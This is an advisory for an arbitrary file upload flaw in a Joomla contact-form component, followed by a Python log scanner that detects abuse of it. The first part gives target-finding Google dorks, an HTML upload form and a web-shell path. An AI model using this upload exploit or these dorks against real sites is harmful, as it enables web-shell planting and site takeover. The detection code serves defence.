Joomla Sexy Contact Form Arbitrary File Upload Vulnerability
Google Dork: "/components/com_sexycontactform/"
Google Dork: "Powered by sexycontact"
Google Dork: inurl:"sexy-contact-form"
Exploit : components/com_sexycontactform/fileupload/index.php
Shell Access : http://www.[target].com/components/com_sexycontactform/fileupload/files/shell.php
HTML Upload Source:
<form method="POST" action="http://localhost/components/com_sexycontactform//fileupload/index.php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
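
For site owners checking whether this endpoint has been used against them, the following is an added example (not part of the original advisory) that scans web access logs for POSTs to the upload handler and for script requests under the upload directory named above. It assumes the Apache/nginx "combined" log format and a constructed list of script extensions; the sample log lines are constructed.

```python
import re
from urllib.parse import unquote

# Paths taken from the advisory text above.
UPLOAD_ENDPOINT = "/components/com_sexycontactform/fileupload/index.php"
UPLOAD_DIR = "/components/com_sexycontactform/fileupload/files/"
# Assumption: extensions the server's PHP handler may execute; match your own config.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(?:/|$)", re.I)
# Assumption: Apache/nginx "combined" access-log format.
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) '
)

def normalize(uri):
    """Drop the query string, decode %xx and collapse repeated slashes."""
    path = unquote(uri.split("?", 1)[0])
    return re.sub(r"/{2,}", "/", path)

def scan(lines):
    """Return (ip, kind, path, status) for requests matching this issue."""
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a combined-format request line
        path = normalize(m["uri"])
        kind = None
        if m["method"] == "POST" and UPLOAD_ENDPOINT in path:
            kind = "upload"  # something was sent to the upload handler
        elif UPLOAD_DIR in path:
            tail = path.split(UPLOAD_DIR, 1)[1]
            if SCRIPT_EXT.search(tail):
                kind = "script-request"  # script requested from the upload dir
        if kind:
            findings.append((m["ip"], kind, path, int(m["status"])))
    return findings

# Constructed sample log lines (documentation-range addresses).
SAMPLE = [
    '203.0.113.7 - - [10/Oct/2014:13:55:36 +0000] "POST /components/com_sexycontactform//fileupload/index.php/ HTTP/1.1" 200 312 "-" "curl/7.35.0"',
    '203.0.113.7 - - [10/Oct/2014:13:55:41 +0000] "GET /components/com_sexycontactform/fileupload/files/shell.php HTTP/1.1" 200 87 "-" "curl/7.35.0"',
    '198.51.100.4 - - [10/Oct/2014:13:56:02 +0000] "GET /components/com_sexycontactform/fileupload/files/cv.pdf HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Oct/2014:13:56:10 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A "script-request" finding with status 200 means a script file exists in the upload directory and was served, so the directory contents should be reviewed on disk as well.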